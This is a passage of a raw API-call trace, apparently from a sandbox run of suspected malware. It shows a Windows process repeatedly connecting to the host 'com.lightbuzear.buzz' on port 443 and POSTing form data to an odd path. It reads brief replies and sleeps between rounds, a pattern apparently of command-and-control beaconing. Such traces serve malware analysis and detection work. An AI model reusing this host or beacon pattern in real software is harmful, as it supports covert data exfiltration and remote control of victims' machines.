Flags=0x0, Size=0x6) returned 0x47ce690 [0303.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0303.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c978 [0303.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0303.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca20 [0303.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c978 | out: hHeap=0x4780000) returned 1 [0303.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0303.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca20 | out: hHeap=0x4780000) returned 1 [0303.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeb00 [0303.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0303.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0303.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0303.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eee48 [0303.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0303.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0303.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0303.822] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0303.822] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0303.822] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0303.822] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0303.823] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0303.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0303.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0303.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0303.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0303.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0303.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0303.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0303.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0303.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0303.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c8b8 [0303.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0303.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c9a8 [0303.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c8b8 | out: hHeap=0x4780000) returned 1 [0303.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0303.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0303.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eee70 [0303.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0303.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0303.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eee70 | out: hHeap=0x4780000) returned 1 [0303.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eebf0 [0303.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0303.837] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eee70 [0303.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0303.838] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0303.838] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0303.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0303.838] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eee70 | out: hHeap=0x4780000) returned 1 [0303.838] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0303.839] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0303.839] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0303.839] FreeLibrary (hLibModule=0x71570000) returned 1 [0303.839] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0303.839] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0303.839] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0303.839] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed08 | out: hHeap=0x4780000) returned 1 [0303.840] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0303.840] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeda8 | out: hHeap=0x4780000) returned 1 [0303.840] Sleep (dwMilliseconds=0x2710) [0303.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0303.862] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0303.862] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0303.862] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0303.862] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0303.862] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0303.862] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0303.862] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0303.862] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0303.862] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c8a0 [0303.862] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0303.862] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca80 [0303.862] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c8a0 | out: hHeap=0x4780000) returned 1 [0303.862] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0303.862] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca80 | out: hHeap=0x4780000) returned 1 [0303.862] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c8a0 [0303.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0303.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0303.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0303.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed08 [0303.863] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0303.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0303.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0303.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0303.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0303.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0303.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0303.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0303.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0303.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0303.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c9a8 [0303.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0303.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cac8 [0303.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0303.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0303.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cac8 | out: hHeap=0x4780000) returned 1 [0303.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eee70 [0303.865] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0303.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0303.865] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eee70 | out: hHeap=0x4780000) returned 1 [0303.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eee70 [0303.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0303.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0303.865] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0303.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0303.866] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0303.866] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0303.866] FreeLibrary (hLibModule=0x71780000) returned 1 [0303.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0303.867] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0303.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0303.867] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0303.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0303.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0303.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0303.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0303.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0303.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0303.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0303.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0303.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0303.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca68 [0303.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0303.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482caf8 [0303.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca68 | out: hHeap=0x4780000) returned 1 [0303.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0303.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482caf8 | out: hHeap=0x4780000) returned 1 [0303.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482cab0 [0303.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0303.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0303.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0303.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0303.868] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0303.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0303.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0303.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0303.869] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0303.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0303.869] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0303.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0303.869] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0303.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0303.869] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0303.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c8b8 [0303.869] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0303.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c8d0 [0303.869] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c8b8 | out: hHeap=0x4780000) returned 1 [0303.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0303.886] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c8d0 | out: hHeap=0x4780000) returned 1 [0303.886] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c9d8 [0303.886] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeda8 [0303.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeda8 | out: hHeap=0x4780000) returned 1 [0303.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0303.887] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0303.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0303.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0303.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0303.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0303.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0303.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0303.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0303.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0303.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0303.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c960 [0303.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0303.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482caf8 [0303.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0303.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0303.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482caf8 | out: hHeap=0x4780000) returned 1 [0303.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeda8 [0303.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0303.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0303.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeda8 | out: hHeap=0x4780000) returned 1 [0303.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeda8 [0303.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0303.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef140 [0303.889] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0303.889] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0303.889] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0303.889] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0303.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef140 | out: hHeap=0x4780000) returned 1 [0303.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0303.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0303.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0303.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0303.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0303.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0303.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0303.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0303.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0303.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c960 [0303.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0303.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c9c0 [0303.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0303.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0303.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9c0 | out: hHeap=0x4780000) returned 1 [0303.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef320 [0303.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0303.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0303.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef320 | out: hHeap=0x4780000) returned 1 [0303.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef3e8 [0303.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0303.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef398 [0303.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0303.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0303.892] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0303.892] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0305.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef398 | out: hHeap=0x4780000) returned 1 [0305.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0305.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0305.070] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0305.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0305.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0305.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0305.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0305.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0305.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0305.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0305.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0305.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0305.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c870 [0305.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0305.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c990 [0305.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c870 | out: hHeap=0x4780000) returned 1 [0305.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0305.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c990 | out: hHeap=0x4780000) returned 1 [0305.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef168 [0305.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0305.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbda0 [0305.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef168 | out: hHeap=0x4780000) returned 1 [0305.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef348 [0305.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0305.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef2d0 [0305.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0305.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0305.072] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0305.072] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0305.073] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef2d0 | out: hHeap=0x4780000) returned 1 [0305.075] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0305.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0305.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0305.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0305.075] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, 